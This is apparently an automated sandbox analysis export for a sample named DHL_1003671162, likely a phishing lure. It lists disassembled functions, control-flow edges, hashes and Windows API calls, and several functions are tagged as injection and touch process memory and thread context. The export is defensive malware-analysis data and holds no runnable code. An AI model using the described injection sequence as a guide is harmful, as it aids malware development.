                                                control_flow_graph 778 289d088-289d127 GetCurrentProcess 782 289d129-289d12f 778->782 783 289d130-289d164 GetCurrentThread 778->783 782->783 784 289d16d-289d1a1 GetCurrentProcess 783->784 785 289d166-289d16c 783->785 786 289d1aa-289d1c5 call 289d268 784->786 787 289d1a3-289d1a9 784->787 785->784 791 289d1cb-289d1fa GetCurrentThreadId 786->791 787->786 792 289d1fc-289d202 791->792 793 289d203-289d265 791->793 792->793
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0289D116
                                                • GetCurrentThread.KERNEL32 ref: 0289D153
                                                • GetCurrentProcess.KERNEL32 ref: 0289D190
                                                • GetCurrentThreadId.KERNEL32 ref: 0289D1E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 3f377fe35f6efbe6f08ade424db988f684d61ec5ad83189a07de1fa218c4092b
                                                • Instruction ID: b7a8c3fe406c61eda16ce5afac1d6c91288c1e374c9cba66d7c0b35408ee8d3d
                                                • Opcode Fuzzy Hash: 3f377fe35f6efbe6f08ade424db988f684d61ec5ad83189a07de1fa218c4092b
                                                • Instruction Fuzzy Hash: 095175B49012498FDB04DFA9D548B9EFBF1EF48304F248069E419A7360D774A985CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0289D098 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 800 289d098-289d127 GetCurrentProcess 804 289d129-289d12f 800->804 805 289d130-289d164 GetCurrentThread 800->805 804->805 806 289d16d-289d1a1 GetCurrentProcess 805->806 807 289d166-289d16c 805->807 808 289d1aa-289d1c5 call 289d268 806->808 809 289d1a3-289d1a9 806->809 807->806 813 289d1cb-289d1fa GetCurrentThreadId 808->813 809->808 814 289d1fc-289d202 813->814 815 289d203-289d265 813->815 814->815
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 0289D116
                                                • GetCurrentThread.KERNEL32 ref: 0289D153
                                                • GetCurrentProcess.KERNEL32 ref: 0289D190
                                                • GetCurrentThreadId.KERNEL32 ref: 0289D1E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: d6b826b7e0de6619811533f5baab0914d4bc0af2505167ec3f92b85c49fa9171
                                                • Instruction ID: 34fb370b00321013749eac66d150ac05fd3ccb5a475ef89406ca80da9ab594bf
                                                • Opcode Fuzzy Hash: d6b826b7e0de6619811533f5baab0914d4bc0af2505167ec3f92b85c49fa9171
                                                • Instruction Fuzzy Hash: DD5155B4901209CFDB14EFA9D548B9EFBF1EF48304F248069E419A7360D774A984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B0B73 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 822 71b0b73-71b0ba0 824 71b0ba5-71b0ba8 822->824 825 71b0baa 824->825 826 71b0bb1-71b0bb7 824->826 825->826 827 71b0bfa-71b0bff 825->827 828 71b0c29-71b0c30 825->828 829 71b0c09-71b0c1b 825->829 830 71b0bc8-71b0bd6 825->830 831 71b0c5f-71b0c66 825->831 832 71b0c01 825->832 833 71b0c69-71b0c73 826->833 834 71b0bbd-71b0bc6 826->834 827->824 836 71b0c32-71b0c36 828->836 837 71b0c37-71b0c39 828->837 829->833 835 71b0c1d-71b0c24 829->835 838 71b0bd8 830->838 839 71b0bdf-71b0be6 830->839 832->829 834->824 835->824 836->837 840 71b0c3b 837->840 841 71b0c45-71b0c4f 837->841 842 71b0bdd 838->842 839->833 843 71b0bec-71b0bf8 839->843 845 71b0c40 840->845 841->833 846 71b0c51-71b0c5d 841->846 842->824 843->842 845->824 846->845
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8bq$8bq$8bq$8bq
                                                • API String ID: 0-2509483264
                                                • Opcode ID: fd47ce13345e15a951b5e1a36d185ca9a4eae50e5d3bd5205369cef07f97658a
                                                • Instruction ID: 91404556f5e17e6201c9f66e59a237b32110fc4bf6276bcff96622af7fc21da3
                                                • Opcode Fuzzy Hash: fd47ce13345e15a951b5e1a36d185ca9a4eae50e5d3bd5205369cef07f97658a
                                                • Instruction Fuzzy Hash: 022147B0628215CFD7388B69D9907FBBBA5FB49319F058267E0A6CB1D1CB38DA408711
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B0758 Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 955 71b0758-71b0776 959 71b077b-71b077e 955->959 960 71b0780 959->960 961 71b0787-71b078b 959->961 960->961 964 71b090a-71b0983 960->964 965 71b0a8a-71b0aa1 960->965 966 71b07e9-71b07ee 960->966 967 71b09a8-71b09ab 960->967 968 71b0903-71b0905 960->968 969 71b0ad2-71b0ad9 960->969 970 71b0812-71b0816 960->970 971 71b07f0 960->971 972 71b09f5-71b0a53 960->972 973 71b07d4-71b07e1 960->973 974 71b0854-71b0858 960->974 962 71b078d-71b0796 961->962 963 71b07ac 961->963 980 71b0798-71b079b 962->980 981 71b079d-71b07a0 962->981 977 71b07af-71b07b1 963->977 1035 71b099b-71b09a3 964->1035 1036 71b0985-71b098b 964->1036 1015 71b0ab9-71b0ac1 call 71be330 965->1015 1016 71b0aa3-71b0aa9 965->1016 966->959 990 71b09b4-71b09b6 967->990 982 71b07fd-71b0800 968->982 975 71b0839 970->975 976 71b0818-71b0821 970->976 971->982 1039 71b0a5d-71b0a6b 972->1039 973->966 978 71b087b 974->978 979 71b085a-71b0863 974->979 989 71b083c-71b0846 975->989 984 71b0828-71b0835 976->984 985 71b0823-71b0826 976->985 992 71b07cd-71b07d2 977->992 993 71b07b3-71b07bd 977->993 991 71b087e-71b08e8 978->991 987 71b086a-71b0877 979->987 988 71b0865-71b0868 979->988 983 71b07aa 980->983 981->983 982->970 997 71b0802 982->997 983->977 998 71b0837 984->998 985->998 1000 71b0879 987->1000 988->1000 1005 71b0851 989->1005 1001 71b09b8-71b09be 990->1001 1002 71b09ce-71b09d5 990->1002 1037 71b08ea-71b08f0 991->1037 1038 71b0900 991->1038 992->973 999 71b07cb 992->999 1003 71b07bf-71b07c6 993->1003 1004 71b07f3-71b07f8 993->1004 997->964 997->965 997->967 997->968 997->969 997->970 997->972 997->974 998->989 999->959 1000->991 1009 71b09c2-71b09c4 1001->1009 1010 71b09c0 1001->1010 1047 71b09da call 71bc898 1002->1047 1048 71b09da call 71bc8a8 1002->1048 1049 71b09da call 71bb294 1002->1049 1050 71b09da call 71bb2b4 1002->1050 1051 71b09da call 71bb2a4 1002->1051 1003->999 1004->982 1005->974 1009->1002 1010->1002 1028 71b0ac8-71b0acd 1015->1028 1019 71b0aab 1016->1019 1020 71b0aad-71b0aaf 1016->1020 1017 71b09e0 1024 71b09e8-71b09f0 1017->1024 1019->1015 1020->1015 1024->982 1028->982 1035->982 1040 71b098f-71b0991 1036->1040 1041 71b098d 1036->1041 1042 71b08f2 1037->1042 1043 71b08f4-71b08f6 1037->1043 1038->968 1044 71b0a71-71b0a85 1039->1044 1040->1035 1041->1035 1042->1038 1043->1038 1044->982 1047->1017 1048->1017 1049->1017 1050->1017 1051->1017
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: 5339d731f912bf5d3546571ae0a2ab42bb83958f43946cbf34e5be2ab6594919
                                                • Instruction ID: 7615cfb2358a918e878c71845c9718dabc696617608708b73fa86c2eef3d7e73
                                                • Opcode Fuzzy Hash: 5339d731f912bf5d3546571ae0a2ab42bb83958f43946cbf34e5be2ab6594919
                                                • Instruction Fuzzy Hash: 83818274B40208DFDB299B64C959BFE77A2FB88700F108429E543AB3D4DB758D81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B0809 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1052 71b0809-71b0810 1053 71b07f8 1052->1053 1054 71b0812-71b0816 1052->1054 1057 71b07fd-71b0800 1053->1057 1055 71b0839 1054->1055 1056 71b0818-71b0821 1054->1056 1060 71b083c-71b0846 1055->1060 1058 71b0828-71b0835 1056->1058 1059 71b0823-71b0826 1056->1059 1057->1054 1061 71b0802 1057->1061 1069 71b0837 1058->1069 1059->1069 1070 71b0851 1060->1070 1061->1054 1062 71b090a-71b0983 1061->1062 1063 71b0a8a-71b0aa1 1061->1063 1064 71b09a8-71b09ab 1061->1064 1065 71b0903-71b0905 1061->1065 1066 71b0ad2-71b0ad9 1061->1066 1067 71b09f5-71b0a53 1061->1067 1068 71b0854-71b0858 1061->1068 1113 71b099b-71b09a3 1062->1113 1114 71b0985-71b098b 1062->1114 1092 71b0ab9-71b0ac1 call 71be330 1063->1092 1093 71b0aa3-71b0aa9 1063->1093 1080 71b09b4-71b09b6 1064->1080 1065->1057 1115 71b0a5d-71b0a6b 1067->1115 1071 71b087b 1068->1071 1072 71b085a-71b0863 1068->1072 1069->1060 1070->1068 1074 71b087e-71b08e8 1071->1074 1077 71b086a-71b0877 1072->1077 1078 71b0865-71b0868 1072->1078 1111 71b08ea-71b08f0 1074->1111 1112 71b0900 1074->1112 1081 71b0879 1077->1081 1078->1081 1082 71b09b8-71b09be 1080->1082 1083 71b09ce-71b09d5 1080->1083 1081->1074 1089 71b09c2-71b09c4 1082->1089 1090 71b09c0 1082->1090 1123 71b09da call 71bc898 1083->1123 1124 71b09da call 71bc8a8 1083->1124 1125 71b09da call 71bb294 1083->1125 1126 71b09da call 71bb2b4 1083->1126 1127 71b09da call 71bb2a4 1083->1127 1089->1083 1090->1083 1091 71b09e0 1100 71b09e8-71b09f0 1091->1100 1104 71b0ac8-71b0acd 1092->1104 1096 71b0aab 1093->1096 1097 71b0aad-71b0aaf 1093->1097 1096->1092 1097->1092 1100->1057 1104->1057 1116 71b08f2 1111->1116 1117 71b08f4-71b08f6 1111->1117 1112->1065 1113->1057 1118 71b098f-71b0991 1114->1118 1119 71b098d 1114->1119 1120 71b0a71-71b0a85 1115->1120 1116->1112 1117->1112 1118->1113 1119->1113 1120->1057 1123->1091 1124->1091 1125->1091 1126->1091 1127->1091
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $^q$$^q
                                                • API String ID: 0-355816377
                                                • Opcode ID: f002482b7d7aaf16c68ee96e8a3562d033e9504c1a3dd94fa0e7b2a8a4a6542a
                                                • Instruction ID: 5156981bdc51673b4ecc446e99e9f0c0417320a540dd6ebd420b4aa7a9a97f55
                                                • Opcode Fuzzy Hash: f002482b7d7aaf16c68ee96e8a3562d033e9504c1a3dd94fa0e7b2a8a4a6542a
                                                • Instruction Fuzzy Hash: F761A674B40208DFDB299A74C9597BE77A3FB88B00F208429E907AB3D4CB759D41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B6DC9 Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1155 71b6dc9-71b6dd4 1156 71b6e49-71b6e4e 1155->1156 1157 71b6dd6-71b6df6 1155->1157 1158 71b6e61-71b6e68 1156->1158 1159 71b6e50-71b6e5f 1156->1159 1160 71b6df8 1157->1160 1161 71b6dfd-71b6e02 1157->1161 1162 71b6e6f-71b6e7c 1158->1162 1159->1162 1160->1161 1171 71b6e05 call 71b6ec1 1161->1171 1172 71b6e05 call 71b6ed0 1161->1172 1163 71b6e12-71b6e2e 1162->1163 1165 71b6e30 1163->1165 1166 71b6e37-71b6e38 1163->1166 1164 71b6e0b 1164->1163 1165->1164 1165->1166 1167 71b6ea5-71b6ea9 1165->1167 1168 71b6e3a-71b6e48 1165->1168 1169 71b6e7e-71b6ea0 1165->1169 1166->1167 1168->1156 1169->1163 1171->1164 1172->1164
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3H5$3H5
                                                • API String ID: 0-2752242361
                                                • Opcode ID: 5ea7be22bc40415373672691b972749965a2f72db41d2bb73443d2bfb63663f9
                                                • Instruction ID: 6ecaf3bfba271ce250b38aeb420d9ea9775c05421079f43ddff173c9b175c42d
                                                • Opcode Fuzzy Hash: 5ea7be22bc40415373672691b972749965a2f72db41d2bb73443d2bfb63663f9
                                                • Instruction Fuzzy Hash: 593148B0D1120ADFCB58CFA9D5805EEFBF1BF99200F1495AAD408BB254E7309A45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE8801D Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0AE8825E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: e49067e969fec1d8b49d9fc95ca0d44c900e44ecc76cee98df59b3e873bbf66f
                                                • Instruction ID: 640e9cf4478b9fdfdcaf5428582aca758ea3499283fc2dc349d0936094c5ffde
                                                • Opcode Fuzzy Hash: e49067e969fec1d8b49d9fc95ca0d44c900e44ecc76cee98df59b3e873bbf66f
                                                • Instruction Fuzzy Hash: EBA17AB1D00619DFEB20DF68C8407EEBBB2BF48354F5485A9E84CA7280DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE88028 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0AE8825E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 2afb3ba8c6564ef0e880561b2031cbfc398a7c3e78372d634af597fe6f8ad9df
                                                • Instruction ID: b5b2e3f3c0daad979bea909804fc1a68b1dc07cfed6e502102da23e4de9f855b
                                                • Opcode Fuzzy Hash: 2afb3ba8c6564ef0e880561b2031cbfc398a7c3e78372d634af597fe6f8ad9df
                                                • Instruction Fuzzy Hash: B4916AB1D00619DFEB20DF68C8407EEBBB2BF48354F5485A9E84CA7290DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0289AD00 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0289AF56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: d2b9c345fc488069dab0ce543594f130770fbb243bf17a74bc9116529431c721
                                                • Instruction ID: 41367511af85fa3e4cb879f1516099e6c3308415b1b12e564441254580fa0ad3
                                                • Opcode Fuzzy Hash: d2b9c345fc488069dab0ce543594f130770fbb243bf17a74bc9116529431c721
                                                • Instruction Fuzzy Hash: 2F714478A00B058FDB68DF2AC44475ABBF6FF88304F04892DD08AD7A50DB75E946CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 028944B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 028959A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: c75818e119ff7281d0cfa0ae6c9842fe59de80bbcfa325d83f7fc9a28c5dae3f
                                                • Instruction ID: e46dc4239435914e888eeb5d8c26d9802d15813c472d8fd0d4974ba62c41e8d2
                                                • Opcode Fuzzy Hash: c75818e119ff7281d0cfa0ae6c9842fe59de80bbcfa325d83f7fc9a28c5dae3f
                                                • Instruction Fuzzy Hash: BC41E3B4C00719CFEB24CFA9C84479EBBF5BF49304F248069D409AB251DB75694ACF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 028958ED Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 028959A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: aefc6cdbcf09bebcb39d368cfb86c219609b5856c42c4a932fdaebff37b47b4a
                                                • Instruction ID: 74a366458c9277edc31187ffd042ce89910af8724d0f1eb5b2fff3cb706ab41e
                                                • Opcode Fuzzy Hash: aefc6cdbcf09bebcb39d368cfb86c219609b5856c42c4a932fdaebff37b47b4a
                                                • Instruction Fuzzy Hash: 9041D4B4D00719CFDB24CFA9C88478DBBF5BF45304F24809AD409AB255DB75694ACF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0289D3A1 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0289D367
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: a31237e473fbffba83facdc966b15be3cc7ef88bbfe305afb74684c5731e7be1
                                                • Instruction ID: 554c4aeb92a70aeb1a933912c3f62d7808bbb24f0dfd1d6c2b62c2d007f7e0f1
                                                • Opcode Fuzzy Hash: a31237e473fbffba83facdc966b15be3cc7ef88bbfe305afb74684c5731e7be1
                                                • Instruction Fuzzy Hash: 5731307CA807548FE709DF60F8687693BA9F788359F11882AE9018B3C9EB754C53CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE8799A Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0AE87A30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 11f67d615c289f091d358d48b59d5390dadbb95fd7d68c876421cb9f21921c14
                                                • Instruction ID: a396297a5bbb7a724d2b924b8dae6182fbcd9253af8400718bffed6400027f3b
                                                • Opcode Fuzzy Hash: 11f67d615c289f091d358d48b59d5390dadbb95fd7d68c876421cb9f21921c14
                                                • Instruction Fuzzy Hash: 782135B19002499FDB10DFA9C885BEEBFF1BF48314F148429E998A7250C7789945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE879A0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0AE87A30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 6d97b4505e01cc9b2d088794282533fe1b87fa138a0a2b7a9b35f3ad619c3c44
                                                • Instruction ID: 3d4c5d2857949935155e7a0a1dff2b9fe7f000948726c877814601706f0de842
                                                • Opcode Fuzzy Hash: 6d97b4505e01cc9b2d088794282533fe1b87fa138a0a2b7a9b35f3ad619c3c44
                                                • Instruction Fuzzy Hash: EC2136B19003599FDB10DFA9C885BDEBBF5FF48314F10842AE958A7250C778A984CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0289D2D8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0289D367
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 65df9daf47508bbed1438fd6bce102af85bbb6ef9a36f6a352d65e1d0ca72f0e
                                                • Instruction ID: 837a084a3a7372fa263889fa4342c845cb2b285c20d3f18a812041ca52da4e58
                                                • Opcode Fuzzy Hash: 65df9daf47508bbed1438fd6bce102af85bbb6ef9a36f6a352d65e1d0ca72f0e
                                                • Instruction Fuzzy Hash: 7D21E3B59003089FDB10CFAAD584ADEBFF4FB48324F14802AE958A7310D374A955CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE87A88 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AE87B10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 862f4335b8115cf19261721dd0e409725ca5450875930df5705c8d03f9a89e6c
                                                • Instruction ID: 76fd236987defdc5ec6f823eedf5226168a940e41161129849e9a3f47c54e4be
                                                • Opcode Fuzzy Hash: 862f4335b8115cf19261721dd0e409725ca5450875930df5705c8d03f9a89e6c
                                                • Instruction Fuzzy Hash: 332136B1D002499FDB10DFA9C881AEEBBF1FF88314F108429E598A7250C7389945CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE87800 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0AE87886
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: b1aa71e98e6e39f851709df55521f508ae84c1d0b3ec939a1ef906c39f13b5cc
                                                • Instruction ID: 30b6f4770919aefbb384885b092b6b145712a5906fd617803f95f8e508ee7035
                                                • Opcode Fuzzy Hash: b1aa71e98e6e39f851709df55521f508ae84c1d0b3ec939a1ef906c39f13b5cc
                                                • Instruction Fuzzy Hash: CF2157B1D002488FDB10DFAAC4857EEBFF0AF88314F248429D499A7241CB78A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE87A90 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AE87B10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 5c8e3d30966d4e6ea1d283c21e1cc09b28a046c785c321823765e4ea251a8aeb
                                                • Instruction ID: 971f25c09a92042b3e409d481f31cd3e0e1903decf7060626a2a7cf1ee2dc637
                                                • Opcode Fuzzy Hash: 5c8e3d30966d4e6ea1d283c21e1cc09b28a046c785c321823765e4ea251a8aeb
                                                • Instruction Fuzzy Hash: 632128B19003599FDB10DFAAC885ADEFBF5FF48314F108429E558A7250C738A544CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE87808 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0AE87886
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 90ecb3c58fbf79aa284f8e1e4c1702850f8786611a60a374b83df728b7992c88
                                                • Instruction ID: 7e9afeb39a4d06a8fff2983dc83a057f47190def3904a5a9e0a50d6569029004
                                                • Opcode Fuzzy Hash: 90ecb3c58fbf79aa284f8e1e4c1702850f8786611a60a374b83df728b7992c88
                                                • Instruction Fuzzy Hash: 592129B1D003199FDB10DFAAC4857EEBBF4EF48324F148429D459A7241C778A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0289D2E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0289D367
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: fc143a25cc9312efdd7a98c8f481c6c203e9d6a7408358481e732a9e0d51b430
                                                • Instruction ID: dbecbcdeab8c9b12c5bb50a462ee8e80958e3db82c329f43ea575181181943e4
                                                • Opcode Fuzzy Hash: fc143a25cc9312efdd7a98c8f481c6c203e9d6a7408358481e732a9e0d51b430
